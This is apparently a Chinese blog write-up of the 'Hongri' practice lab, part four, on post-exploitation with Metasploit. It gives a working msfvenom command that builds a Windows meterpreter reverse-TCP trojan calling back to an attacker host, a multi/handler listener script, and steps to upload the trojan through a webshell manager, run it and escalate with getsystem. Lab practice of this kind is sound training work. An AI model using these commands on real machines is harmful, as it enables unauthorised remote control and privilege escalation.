红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段

    一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器
    Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL)

常用选项
		-p   				//指定生成的Payload
		--list payload  	//列出所支持的Payload类型
		--list-options      //查看模块所支持的选项
		msfvenom -p windows/meterpreter/reverse_tcp --list-options  //查看模块所支持的选项
			
		-f     				      //指定生成的文件格式
		msfvenom --list formats   //查看所支持的文件格式
		
常用的Windows Payload:
		windows/meterpreter/reverse_tcp(使用meteperter模块,建立一个反向的TCP连接)
		windows/meterpreter_reverse_tcp
		windows/x64/meterpreter/reverse_tcp

1、生成反向木马

使用msfvenom生成一个木马程序 (msfvenom是有效载荷(payload)生成工具和编码工具的结合)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.195.20 LPORT=1234 -f exe > shell.exe

 2、在kali端创建侦听器

msf中相应的模块:exploit/multi/handler    
模块中所使用的payload应该与msfvenom中的payload保持一致

可以把命令写入到一个文件中,MSF

msfconsole -r
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.195.20
set LPORT 1234
set AutoRunScript post/windows/manage/migrate
exploit -j -z

然后使用 -r指定文件名,这样下次就不用一个一个写入了。

 3、把生成的shell.exe上传(部署)目标系统

通过蚁剑上传使用msfvenom生成的反向木马

(1)选中目标主机后右击

(2)进入文件系统后点击上传

 (3)找到反向木马后上传

4、 执行木马

dir看一下是否传输成功

直接执行该文件

这时候我们返回到MSF中就可以看到了,这时候我们可以使用getsystem直接提权。

猜你喜欢

转载自blog.csdn.net/zhouA0221/article/details/141970011